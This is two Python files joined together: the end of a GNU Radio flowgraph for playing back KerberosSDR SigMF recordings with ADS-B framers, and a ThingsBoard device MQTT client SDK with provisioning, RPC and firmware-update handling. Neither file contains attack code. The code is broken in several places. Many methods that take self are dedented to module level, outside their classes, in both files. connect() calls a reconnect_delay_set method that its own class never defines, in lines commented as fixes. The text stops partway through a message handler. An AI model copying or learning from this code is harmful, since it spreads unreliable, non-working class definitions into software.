        self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
    def get_throttle(self):
        """Return the current playback throttle divisor."""
        return self.throttle

    def set_throttle(self, throttle):
        """Set throttle: refresh its line-edit text and rescale all four
        throttle blocks to samp_rate / throttle."""
        self.throttle = throttle
        Qt.QMetaObject.invokeMethod(self._throttle_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.throttle)))
        self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
        self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
        self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
        self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
    def get_thresh_phase(self):
        """Return the current phase-trigger threshold."""
        return self.thresh_phase

    def set_thresh_phase(self, thresh_phase):
        """Set thresh_phase: refresh its line-edit text and reapply the
        normal-mode triggers of the two phase time sinks with the new level."""
        self.thresh_phase = thresh_phase
        Qt.QMetaObject.invokeMethod(self._thresh_phase_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh_phase)))
        self.qtgui_time_sink_x_2.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_phase, 0.00005, 3, "")
        self.qtgui_time_sink_x_0_1_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_phase, 0.00005, 4, "")
    def get_thresh_comp(self):
        """Return the current comparison-trigger threshold."""
        return self.thresh_comp

    def set_thresh_comp(self, thresh_comp):
        """Set thresh_comp: refresh its line-edit text and reapply the
        normal-mode trigger of qtgui_time_sink_x_0_1_1_0 with the new level."""
        self.thresh_comp = thresh_comp
        Qt.QMetaObject.invokeMethod(self._thresh_comp_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh_comp)))
        self.qtgui_time_sink_x_0_1_1_0.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh_comp, 0.0001, self.trig_channel, "")
    def get_thresh(self):
        """Return the current detection threshold."""
        return self.thresh

    def set_thresh(self, thresh):
        """Set thresh and fan it out to every dependent block.

        Refreshes the line-edit text, reapplies trigger levels on the time
        sinks, updates the constant-source offsets (the threshold overlay
        traces), and pushes the new threshold into all five ADS-B framers.
        """
        self.thresh = thresh
        Qt.QMetaObject.invokeMethod(self._thresh_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.thresh)))
        # Normal-mode triggers use the configured channel/delay; auto-mode sinks use fixed channel 0.
        self.qtgui_time_sink_x_0_1_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, 0.0001, self.trig_channel, "")
        self.qtgui_time_sink_x_0_1.set_trigger_mode(qtgui.TRIG_MODE_NORM, qtgui.TRIG_SLOPE_POS, self.thresh, self.trig_delay, self.trig_channel, "")
        self.qtgui_time_sink_x_0_0_1.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
        self.qtgui_time_sink_x_0_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
        self.qtgui_time_sink_x_0_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
        self.qtgui_time_sink_x_0.set_trigger_mode(qtgui.TRIG_MODE_AUTO, qtgui.TRIG_SLOPE_POS, self.thresh, 0, 0, "")
        # Constant sources feed port 1 of the per-channel time sinks as a threshold marker line.
        self.analog_const_source_x_0_0_0_0_0.set_offset(self.thresh)
        self.analog_const_source_x_0_0_0_0.set_offset(self.thresh)
        self.analog_const_source_x_0_0_0.set_offset(self.thresh)
        self.analog_const_source_x_0_0.set_offset(self.thresh)
        self.analog_const_source_x_0.set_offset(self.thresh)
        self.adsb_framer_1_0_0_0_0.set_threshold(self.thresh)
        self.adsb_framer_1_0_0_0.set_threshold(self.thresh)
        self.adsb_framer_1_0_0.set_threshold(self.thresh)
        self.adsb_framer_1_0.set_threshold(self.thresh)
        self.adsb_framer_1.set_threshold(self.thresh)
    def get_samp_rate(self):
        """Return the current sample rate."""
        return self.samp_rate

    def set_samp_rate(self, samp_rate):
        """Set samp_rate and fan it out to every rate-dependent block.

        Updates the frequency range of the waterfall and frequency sinks,
        the sample rate of all time sinks (the peak-tracking sink runs at
        samp_rate / nfft), and rescales the four throttle blocks.
        """
        self.samp_rate = samp_rate
        self.qtgui_waterfall_sink_x_0_0_1.set_frequency_range(0, self.samp_rate)
        self.qtgui_waterfall_sink_x_0_0_0.set_frequency_range(0, self.samp_rate)
        self.qtgui_waterfall_sink_x_0_0.set_frequency_range(0, self.samp_rate)
        self.qtgui_waterfall_sink_x_0.set_frequency_range(0, self.samp_rate)
        self.qtgui_time_sink_x_2.set_samp_rate(self.samp_rate)
        # Peak-magnitude sink is fed one value per nfft-sized FFT frame.
        self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
        self.qtgui_time_sink_x_0_1_1_1.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_1_1_0.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_1_1.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_1_0_0_0_0_0.set_samp_rate(int(self.samp_rate))
        self.qtgui_time_sink_x_0_1_0_0_0_0.set_samp_rate(int(self.samp_rate))
        self.qtgui_time_sink_x_0_1_0_0_0.set_samp_rate(int(self.samp_rate))
        self.qtgui_time_sink_x_0_1_0_0.set_samp_rate(int(self.samp_rate))
        self.qtgui_time_sink_x_0_1_0.set_samp_rate(int(self.samp_rate))
        self.qtgui_time_sink_x_0_1.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_0_1.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_0_0.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0_0.set_samp_rate(self.samp_rate)
        self.qtgui_time_sink_x_0.set_samp_rate(self.samp_rate)
        self.qtgui_freq_sink_x_0_1_0.set_frequency_range(0, self.samp_rate)
        self.qtgui_freq_sink_x_0_1.set_frequency_range(0, self.samp_rate)
        self.qtgui_freq_sink_x_0_0.set_frequency_range(0, self.samp_rate)
        self.qtgui_freq_sink_x_0.set_frequency_range(0, self.samp_rate)
        self.blocks_throttle_3.set_sample_rate(self.samp_rate / self.throttle)
        self.blocks_throttle_2.set_sample_rate(self.samp_rate / self.throttle)
        self.blocks_throttle_1.set_sample_rate(self.samp_rate /self.throttle)
        self.blocks_throttle_0.set_sample_rate(self.samp_rate / self.throttle)
    def get_samp_offset_0_3(self):
        """Return the current samp_offset_0_3 display string."""
        return self.samp_offset_0_3

    def set_samp_offset_0_3(self, samp_offset_0_3):
        """Set samp_offset_0_3 and push the new text to its GUI label."""
        self.samp_offset_0_3 = samp_offset_0_3
        Qt.QMetaObject.invokeMethod(self._samp_offset_0_3_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_3))
    def get_samp_offset_0_2(self):
        """Return the current samp_offset_0_2 display string."""
        return self.samp_offset_0_2

    def set_samp_offset_0_2(self, samp_offset_0_2):
        """Set samp_offset_0_2 and push the new text to its GUI label."""
        self.samp_offset_0_2 = samp_offset_0_2
        Qt.QMetaObject.invokeMethod(self._samp_offset_0_2_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_2))
    def get_samp_offset_0_1(self):
        """Return the current samp_offset_0_1 display string."""
        return self.samp_offset_0_1

    def set_samp_offset_0_1(self, samp_offset_0_1):
        """Set samp_offset_0_1 and push the new text to its GUI label."""
        self.samp_offset_0_1 = samp_offset_0_1
        Qt.QMetaObject.invokeMethod(self._samp_offset_0_1_label, "setText", Qt.Q_ARG("QString", self.samp_offset_0_1))
def get_nfft(self):
    """Return the FFT length used by the averaged sink and offset blocks."""
    return self.nfft

def set_nfft(self, nfft):
    """Update ``nfft`` and propagate it to every dependent block."""
    self.nfft = nfft
    # This sink receives one point per FFT frame, hence samp_rate / nfft.
    self.qtgui_time_sink_x_1.set_samp_rate(self.samp_rate / self.nfft)
    # Re-center FFT bin indices around zero by subtracting nfft / 2.
    self.blocks_add_const_vxx_0_0_0.set_k((-self.nfft / 2, ))
    self.blocks_add_const_vxx_0_0.set_k((-self.nfft / 2, ))
    self.blocks_add_const_vxx_0.set_k((-self.nfft / 2, ))
def get_manual_fine_delay_3(self):
    """Return the operator-entered fine delay (samples) for branch 3."""
    return self.manual_fine_delay_3

def set_manual_fine_delay_3(self, manual_fine_delay_3):
    """Update branch 3's fine delay, its line edit, and its delay block."""
    self.manual_fine_delay_3 = manual_fine_delay_3
    Qt.QMetaObject.invokeMethod(self._manual_fine_delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_3)))
    # Applied delay = coarse delay + probed offset + manual fine trim.
    self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)

def get_manual_fine_delay_2(self):
    """Return the operator-entered fine delay (samples) for branch 2."""
    return self.manual_fine_delay_2

def set_manual_fine_delay_2(self, manual_fine_delay_2):
    """Update branch 2's fine delay, its line edit, and its delay block."""
    self.manual_fine_delay_2 = manual_fine_delay_2
    Qt.QMetaObject.invokeMethod(self._manual_fine_delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_2)))
    self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)

def get_manual_fine_delay_1(self):
    """Return the operator-entered fine delay (samples) for branch 1."""
    return self.manual_fine_delay_1

def set_manual_fine_delay_1(self, manual_fine_delay_1):
    """Update branch 1's fine delay, its line edit, and its delay block."""
    self.manual_fine_delay_1 = manual_fine_delay_1
    Qt.QMetaObject.invokeMethod(self._manual_fine_delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_1)))
    self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)

def get_manual_fine_delay_0(self):
    """Return the operator-entered fine delay (samples) for branch 0."""
    return self.manual_fine_delay_0

def set_manual_fine_delay_0(self, manual_fine_delay_0):
    """Update branch 0's fine delay, its line edit, and its delay block."""
    self.manual_fine_delay_0 = manual_fine_delay_0
    Qt.QMetaObject.invokeMethod(self._manual_fine_delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.manual_fine_delay_0)))
    # Branch 0 is the reference branch: no probed correlation offset is added.
    self.blocks_delay_0_0.set_dly(self.delay_0 + self.manual_fine_delay_0)
def get_delay_3(self):
    """Return the coarse delay (samples) for branch 3."""
    return self.delay_3

def set_delay_3(self, delay_3):
    """Update branch 3's coarse delay, its line edit, and both delay blocks."""
    self.delay_3 = delay_3
    Qt.QMetaObject.invokeMethod(self._delay_3_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_3)))
    # The *_0 delay block adds the probed offset and fine trim on top.
    self.blocks_delay_3_0.set_dly(self.delay_3 + int(self.function_probe_0_3)+self.manual_fine_delay_3)
    self.blocks_delay_3.set_dly(self.delay_3)

def get_delay_2(self):
    """Return the coarse delay (samples) for branch 2."""
    return self.delay_2

def set_delay_2(self, delay_2):
    """Update branch 2's coarse delay, its line edit, and both delay blocks."""
    self.delay_2 = delay_2
    Qt.QMetaObject.invokeMethod(self._delay_2_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_2)))
    self.blocks_delay_2_0.set_dly(self.delay_2 + int(self.function_probe_0_2) + self.manual_fine_delay_2)
    self.blocks_delay_2.set_dly(self.delay_2)

def get_delay_1(self):
    """Return the coarse delay (samples) for branch 1."""
    return self.delay_1

def set_delay_1(self, delay_1):
    """Update branch 1's coarse delay, its line edit, and both delay blocks."""
    self.delay_1 = delay_1
    Qt.QMetaObject.invokeMethod(self._delay_1_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_1)))
    self.blocks_delay_1_0.set_dly(self.delay_1 + int(self.function_probe_0_1) + self.manual_fine_delay_1)
    self.blocks_delay_1.set_dly(self.delay_1)

def get_delay_0(self):
    """Return the coarse delay (samples) for branch 0."""
    return self.delay_0

def set_delay_0(self, delay_0):
    """Update branch 0's coarse delay, its line edit, and both delay blocks."""
    self.delay_0 = delay_0
    Qt.QMetaObject.invokeMethod(self._delay_0_line_edit, "setText", Qt.Q_ARG("QString", str(self.delay_0)))
    # Branch 0 is the reference branch: no probed correlation offset is added.
    self.blocks_delay_0_0.set_dly(self.delay_0 + self.manual_fine_delay_0)
    self.blocks_delay_0.set_dly(self.delay_0)
def get_corr_alpha_0_3(self):
    """Return the IIR averaging coefficient for correlator branch 3."""
    return self.corr_alpha_0_3

def set_corr_alpha_0_3(self, corr_alpha_0_3):
    """Update branch 3's averaging alpha, its line edit, and the IIR filter."""
    self.corr_alpha_0_3 = corr_alpha_0_3
    # eng_notation renders the float in engineering notation for the UI.
    Qt.QMetaObject.invokeMethod(self._corr_alpha_0_3_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_3)))
    self.single_pole_iir_filter_xx_0_0_0.set_taps(self.corr_alpha_0_3)

def get_corr_alpha_0_2(self):
    """Return the IIR averaging coefficient for correlator branch 2."""
    return self.corr_alpha_0_2

def set_corr_alpha_0_2(self, corr_alpha_0_2):
    """Update branch 2's averaging alpha, its line edit, and the IIR filter."""
    self.corr_alpha_0_2 = corr_alpha_0_2
    Qt.QMetaObject.invokeMethod(self._corr_alpha_0_2_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_2)))
    self.single_pole_iir_filter_xx_0_0.set_taps(self.corr_alpha_0_2)

def get_corr_alpha_0_1(self):
    """Return the IIR averaging coefficient for correlator branch 1."""
    return self.corr_alpha_0_1

def set_corr_alpha_0_1(self, corr_alpha_0_1):
    """Update branch 1's averaging alpha, its line edit, and the IIR filter."""
    self.corr_alpha_0_1 = corr_alpha_0_1
    Qt.QMetaObject.invokeMethod(self._corr_alpha_0_1_line_edit, "setText", Qt.Q_ARG("QString", eng_notation.num_to_str(self.corr_alpha_0_1)))
    self.single_pole_iir_filter_xx_0.set_taps(self.corr_alpha_0_1)
def main(top_block_cls=kerberos_sigmf_playback4, options=None):
    """Qt entry point: build the top block, start the flowgraph, and run the
    Qt event loop until the window is closed.

    :param top_block_cls: flowgraph class to instantiate.
    :param options: unused; kept for GRC-generated signature compatibility.
    """
    from distutils.version import StrictVersion
    if StrictVersion(Qt.qVersion()) >= StrictVersion("4.5.0"):
        style = gr.prefs().get_string('qtgui', 'style', 'raster')
        Qt.QApplication.setGraphicsSystem(style)
    qapp = Qt.QApplication(sys.argv)
    tb = top_block_cls()
    tb.start()
    tb.show()

    def quitting():
        # Stop the flowgraph and join its threads before Qt tears down.
        tb.stop()
        tb.wait()
    qapp.connect(qapp, Qt.SIGNAL("aboutToQuit()"), quitting)
    qapp.exec_()

if __name__ == '__main__':
    main()
|
tb_device_mqtt.py | # Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import paho.mqtt.client as paho
from math import ceil
import logging
import time
import queue
from json import loads, dumps
from jsonschema import Draft7Validator
import ssl
from jsonschema import ValidationError
from threading import RLock
from threading import Thread
from sdk_utils import verify_checksum
# --- JSON Schemas used to validate outgoing payloads before publishing. ---

# Flat attribute/telemetry object: at least one property of any
# JSON-serializable type (nested objects allowed).
KV_SCHEMA = {
    "type": "object",
    "patternProperties":
        {
            ".": {"type": ["integer",
                           "string",
                           "boolean",
                           "number",
                           "object"]}
        },
    "minProperties": 1,
}
# Client-side RPC params: may be empty and nested objects are not allowed.
SCHEMA_FOR_CLIENT_RPC = {
    "type": "object",
    "patternProperties":
        {
            ".": {"type": ["integer",
                           "string",
                           "boolean",
                           "number"]}
        },
    "minProperties": 0,
}
# Timestamped telemetry entry: {"ts": <ms since epoch>, "values": {...}}.
TS_KV_SCHEMA = {
    "type": "object",
    "properties": {
        "ts": {
            "type": "integer"
        },
        "values": KV_SCHEMA
    },
    "additionalProperties": False
}
# A list of timestamped telemetry entries.
DEVICE_TS_KV_SCHEMA = {
    "type": "array",
    "items": TS_KV_SCHEMA
}
# A telemetry list whose entries are either timestamped or plain KV objects.
DEVICE_TS_OR_KV_SCHEMA = {
    "type": "array",
    "items": {
        "anyOf":
            [
                TS_KV_SCHEMA,
                KV_SCHEMA
            ]
    }
}
# Pre-built Draft-7 validators for the schemas above (built once at import).
RPC_VALIDATOR = Draft7Validator(SCHEMA_FOR_CLIENT_RPC)
KV_VALIDATOR = Draft7Validator(KV_SCHEMA)
TS_KV_VALIDATOR = Draft7Validator(TS_KV_SCHEMA)
DEVICE_TS_KV_VALIDATOR = Draft7Validator(DEVICE_TS_KV_SCHEMA)
DEVICE_TS_OR_KV_VALIDATOR = Draft7Validator(DEVICE_TS_OR_KV_SCHEMA)

# --- Shared-attribute names describing an available firmware package. ---
FW_TITLE_ATTR = "fw_title"
FW_VERSION_ATTR = "fw_version"
FW_CHECKSUM_ATTR = "fw_checksum"
FW_CHECKSUM_ALG_ATTR = "fw_checksum_algorithm"
FW_SIZE_ATTR = "fw_size"
FW_STATE_ATTR = "fw_state"
# Comma-separated shared keys requested when checking for a firmware update.
REQUIRED_SHARED_KEYS = f"{FW_CHECKSUM_ATTR},{FW_CHECKSUM_ALG_ATTR},{FW_SIZE_ATTR},{FW_TITLE_ATTR},{FW_VERSION_ATTR}"

# --- ThingsBoard device-API MQTT topics. ---
RPC_RESPONSE_TOPIC = 'v1/devices/me/rpc/response/'
RPC_REQUEST_TOPIC = 'v1/devices/me/rpc/request/'
ATTRIBUTES_TOPIC = 'v1/devices/me/attributes'
ATTRIBUTES_TOPIC_REQUEST = 'v1/devices/me/attributes/request/'
ATTRIBUTES_TOPIC_RESPONSE = 'v1/devices/me/attributes/response/'
TELEMETRY_TOPIC = 'v1/devices/me/telemetry'
CLAIMING_TOPIC = 'v1/devices/me/claim'
PROVISION_TOPIC_REQUEST = '/provision/request'
PROVISION_TOPIC_RESPONSE = '/provision/response'

log = logging.getLogger(__name__)

# Human-readable meanings of MQTT CONNACK result codes 1-5.
RESULT_CODES = {
    1: "incorrect protocol version",
    2: "invalid client identifier",
    3: "server unavailable",
    4: "bad username or password",
    5: "not authorised",
}
class TBTimeoutException(Exception):
    """Delivered to callbacks when a ThingsBoard reply does not arrive in time."""
    pass

class TBQoSException(Exception):
    """Raised when an unsupported MQTT QoS level (not 0 or 1) is requested."""
    pass
class ProvisionClient(paho.Client):
    """One-shot MQTT client that performs device provisioning.

    Connects with the reserved "provision" username, publishes the provision
    request, and stores the credentials returned by ThingsBoard.
    """
    PROVISION_REQUEST_TOPIC = "/provision/request"
    PROVISION_RESPONSE_TOPIC = "/provision/response"

    def __init__(self, host, port, provision_request):
        super().__init__()
        self._host = host
        self._port = port
        # "provision" is the reserved username for the provisioning flow.
        self._username = "provision"
        self.on_connect = self.__on_connect
        self.on_message = self.__on_message
        self.__provision_request = provision_request

    def __on_connect(self, client, userdata, flags, rc):  # Callback for connect
        # rc == 0 means the broker accepted the connection.
        if rc == 0:
            log.info("[Provisioning client] Connected to ThingsBoard ")
            client.subscribe(self.PROVISION_RESPONSE_TOPIC)  # Subscribe to provisioning response topic
            provision_request = dumps(self.__provision_request)
            log.info("[Provisioning client] Sending provisioning request %s" % provision_request)
            client.publish(self.PROVISION_REQUEST_TOPIC, provision_request)  # Publishing provisioning request topic
        else:
            log.info("[Provisioning client] Cannot connect to ThingsBoard!, result: %s" % RESULT_CODES[rc])

    def __on_message(self, client, userdata, msg):
        """Handle the provisioning response and disconnect (ends loop_forever)."""
        decoded_payload = msg.payload.decode("UTF-8")
        log.info("[Provisioning client] Received data from ThingsBoard: %s" % decoded_payload)
        decoded_message = loads(decoded_payload)
        provision_device_status = decoded_message.get("status")
        if provision_device_status == "SUCCESS":
            self.__credentials = decoded_message["credentialsValue"]
        else:
            log.error("[Provisioning client] Provisioning was unsuccessful with status %s and message: %s" % (
                provision_device_status, decoded_message["errorMsg"]))
        self.disconnect()

    def provision(self):
        """Run the provisioning handshake synchronously (blocks until done)."""
        log.info("[Provisioning client] Connecting to ThingsBoard")
        # None until a SUCCESS response is received.
        self.__credentials = None
        self.connect(self._host, self._port, 60)
        self.loop_forever()

    def get_credentials(self):
        """Return the credentials obtained by provision(), or None on failure."""
        return self.__credentials
class TBPublishInfo:
    """Wrapper around paho's ``MQTTMessageInfo`` returned from publish calls.

    Exposes the result code, the message id, and a blocking ``get()`` that
    waits until the message has actually been published.
    """

    # Publish result codes (mirroring mosquitto/paho error numbering).
    TB_ERR_AGAIN = -1
    TB_ERR_SUCCESS = 0
    TB_ERR_NOMEM = 1
    TB_ERR_PROTOCOL = 2
    TB_ERR_INVAL = 3
    TB_ERR_NO_CONN = 4
    TB_ERR_CONN_REFUSED = 5
    TB_ERR_NOT_FOUND = 6
    TB_ERR_CONN_LOST = 7
    TB_ERR_TLS = 8
    TB_ERR_PAYLOAD_SIZE = 9
    TB_ERR_NOT_SUPPORTED = 10
    TB_ERR_AUTH = 11
    TB_ERR_ACL_DENIED = 12
    TB_ERR_UNKNOWN = 13
    TB_ERR_ERRNO = 14
    TB_ERR_QUEUE_SIZE = 15

    def __init__(self, message_info):
        # The underlying paho MQTTMessageInfo object.
        self.message_info = message_info

    def rc(self):
        """Return the publish result code (see TB_ERR_* constants)."""
        return self.message_info.rc

    def mid(self):
        """Return the MQTT message id of the publish."""
        return self.message_info.mid

    def get(self):
        """Block until the message is published, then return its result code."""
        info = self.message_info
        info.wait_for_publish()
        return info.rc
class TBDeviceMqttClient:
    """MQTT client implementing the ThingsBoard device API.

    Supports telemetry/attribute publishing, attribute requests, server- and
    client-side RPC, device claiming, provisioning, and firmware updates.
    """

    def __init__(self, host, token=None, port=1883, quality_of_service=None, chunk_size=0):
        """
        :param host: broker hostname or IP.
        :param token: device access token used as the MQTT username.
        :param port: broker port (default 1883).
        :param quality_of_service: default QoS for publishes (defaults to 1).
        :param chunk_size: firmware download chunk size; 0 = whole file at once.
        """
        self._client = paho.Client()
        self.quality_of_service = quality_of_service if quality_of_service is not None else 1
        self.__host = host
        self.__port = port
        if token == "":
            log.warning("token is not set, connection without tls wont be established")
        else:
            self._client.username_pw_set(token)
        # Guards the request/subscription bookkeeping dictionaries below.
        self._lock = RLock()
        # attribute-request id -> callback awaiting the response.
        self._attr_request_dict = {}
        self.stopped = False
        # Pending timeouts consumed by the daemon __timeout_check thread.
        self.__timeout_queue = queue.Queue()
        self.__timeout_thread = Thread(target=self.__timeout_check)
        self.__timeout_thread.daemon = True
        self.__timeout_thread.start()
        self.__is_connected = False
        self.__device_on_server_side_rpc_response = None
        self.__connect_callback = None
        self.__device_max_sub_id = 0
        self.__device_client_rpc_number = 0
        # attribute key -> {subscription id -> callback}.
        self.__device_sub_dict = {}
        # client-side RPC id -> callback awaiting the response.
        self.__device_client_rpc_dict = {}
        self.__attr_request_number = 0
        self._client.on_connect = self._on_connect
        self._client.on_log = self._on_log
        self._client.on_publish = self._on_publish
        self._client.on_message = self._on_message
        self._client.on_disconnect = self._on_disconnect
        # Reported to the platform until a firmware update is applied.
        self.current_firmware_info = {
            "current_" + FW_TITLE_ATTR: "Initial",
            "current_" + FW_VERSION_ATTR: "v0"
        }
        self.__request_id = 0
        self.__firmware_request_id = 0
        self.__chunk_size = chunk_size
        self.firmware_received = False
        # Started lazily by get_firmware_update().
        self.__updating_thread = Thread(target=self.__update_thread, name="Updating thread")
        self.__updating_thread.daemon = True
        # TODO: enable configuration available here:
        # https://pypi.org/project/paho-mqtt/#option-functions
def _on_log(self, client, userdata, level, buf):
    """Paho log callback; intentionally silent (uncomment to debug)."""
    # if isinstance(buf, Exception):
    #     log.exception(buf)
    # else:
    #     log.debug("%s - %s - %s - %s", client, userdata, level, buf)
    pass

def _on_publish(self, client, userdata, result):
    """Paho publish-acknowledged callback; intentionally a no-op."""
    # log.debug("Data published to ThingsBoard!")
    pass

def _on_disconnect(self, client, userdata, result_code):
    """Log every disconnect, even if the logger is configured above DEBUG."""
    prev_level = log.level
    # Temporarily force DEBUG so the disconnect is always recorded.
    log.setLevel("DEBUG")
    log.debug("Disconnected client: %s, user data: %s, result code: %s", str(client), str(userdata),
              str(result_code))
    log.setLevel(prev_level)
def _on_connect(self, client, userdata, flags, result_code, *extra_params):
    """Paho connect callback: notify the user callback, then subscribe to
    the attribute and RPC topics on success (result_code == 0)."""
    if self.__connect_callback:
        # Small delay before invoking the user callback -- presumably to let
        # the caller of connect() finish its own setup first; confirm.
        time.sleep(.05)
        self.__connect_callback(self, userdata, flags, result_code, *extra_params)
    if result_code == 0:
        self.__is_connected = True
        log.info("connection SUCCESS")
        self._client.subscribe(ATTRIBUTES_TOPIC, qos=self.quality_of_service)
        self._client.subscribe(ATTRIBUTES_TOPIC + "/response/+", qos=self.quality_of_service)
        self._client.subscribe(RPC_REQUEST_TOPIC + '+', qos=self.quality_of_service)
        self._client.subscribe(RPC_RESPONSE_TOPIC + '+', qos=self.quality_of_service)
    else:
        if result_code in RESULT_CODES:
            log.error("connection FAIL with error %s %s", result_code, RESULT_CODES[result_code])
        else:
            log.error("connection FAIL with unknown error")
def get_firmware_update(self):
    """Start the firmware-update flow: subscribe to firmware chunks, report
    the currently installed firmware, request the update metadata, and start
    the background updating thread. Call at most once per client."""
    self._client.subscribe("v2/fw/response/+")
    self.send_telemetry(self.current_firmware_info)
    self.__request_firmware_info()
    self.__updating_thread.start()

def __request_firmware_info(self):
    """Ask the platform for the shared attributes describing the firmware."""
    self.__request_id = self.__request_id + 1
    self._client.publish(f"v1/devices/me/attributes/request/{self.__request_id}",
                         dumps({"sharedKeys": REQUIRED_SHARED_KEYS}))
def is_connected(self):
    """Return True once a successful CONNACK has been processed."""
    return self.__is_connected
def connect(self, callback=None, min_reconnect_delay=1, timeout=120, tls=False, ca_certs=None, cert_file=None,
            key_file=None, keepalive=120):
    """Connect to the broker and block until connected or stop() is called.

    :param callback: invoked from _on_connect with the CONNACK details.
    :param min_reconnect_delay: initial automatic-reconnect delay, seconds.
    :param timeout: maximum automatic-reconnect delay, seconds.
    :param tls: enable TLS with the given CA/cert/key files.
    :param keepalive: MQTT keepalive interval, seconds.
    """
    if tls:
        try:
            self._client.tls_set(ca_certs=ca_certs,
                                 certfile=cert_file,
                                 keyfile=key_file,
                                 cert_reqs=ssl.CERT_REQUIRED,
                                 tls_version=ssl.PROTOCOL_TLSv1_2,
                                 ciphers=None)
            self._client.tls_insecure_set(False)
        except ValueError:
            # paho raises ValueError if TLS was already configured on this
            # client (e.g. connect() called twice) -- safe to ignore.
            pass
    # FIX: register the user callback *before* starting the network loop so a
    # fast CONNACK cannot fire _on_connect while __connect_callback is unset.
    self.__connect_callback = callback
    self._client.connect(self.__host, self.__port, keepalive=keepalive)
    # FIX: configure the reconnect backoff once (original called it twice
    # with identical arguments).
    self.reconnect_delay_set(min_reconnect_delay, timeout)
    self._client.loop_start()
    while not self.__is_connected and not self.stopped:
        log.info("Trying to connect to %s...", self.__host)
        time.sleep(1)
def disconnect(self):
    """Disconnect from the broker and stop the paho network loop."""
    self._client.disconnect()
    log.debug(self._client)
    log.debug("Disconnecting from ThingsBoard")
    self.__is_connected = False
    self._client.loop_stop()

def stop(self):
    """Stop the client: ends the timeout thread loop and disconnects."""
    self.stopped = True
    self.disconnect()
def _on_message(self, client, userdata, message):
    """Top-level paho message dispatcher.

    Routes firmware-related attribute updates and firmware chunks itself;
    everything else is JSON-decoded and passed to _on_decoded_message.
    """
    update_response_pattern = "v2/fw/response/" + str(self.__firmware_request_id) + "/chunk/"
    if message.topic.startswith("v1/devices/me/attributes"):
        self.firmware_info = loads(message.payload)
        if "/response/" in message.topic:
            # Attribute *responses* wrap the values in a "shared" object.
            self.firmware_info = self.firmware_info.get("shared", {}) if isinstance(self.firmware_info,
                                                                                    dict) else {}
        # Start a download only when the advertised title/version differs
        # from what this device currently reports.
        if (self.firmware_info.get(FW_VERSION_ATTR) is not None and self.firmware_info.get(
                FW_VERSION_ATTR) != self.current_firmware_info.get("current_" + FW_VERSION_ATTR)) or \
                (self.firmware_info.get(FW_TITLE_ATTR) is not None and self.firmware_info.get(
                    FW_TITLE_ATTR) != self.current_firmware_info.get("current_" + FW_TITLE_ATTR)):
            log.debug('Firmware is not the same')
            self.firmware_data = b''
            self.__current_chunk = 0
            self.current_firmware_info[FW_STATE_ATTR] = "DOWNLOADING"
            self.send_telemetry(self.current_firmware_info)
            time.sleep(1)
            # New request id so stale chunks from an older download are ignored.
            self.__firmware_request_id = self.__firmware_request_id + 1
            self.__target_firmware_length = self.firmware_info[FW_SIZE_ATTR]
            # 0 chunks means "request the whole image in one response".
            self.__chunk_count = 0 if not self.__chunk_size else ceil(
                self.firmware_info[FW_SIZE_ATTR] / self.__chunk_size)
            self.__get_firmware()
    elif message.topic.startswith(update_response_pattern):
        # One firmware chunk: accumulate until the full size is reached.
        firmware_data = message.payload
        self.firmware_data = self.firmware_data + firmware_data
        self.__current_chunk = self.__current_chunk + 1
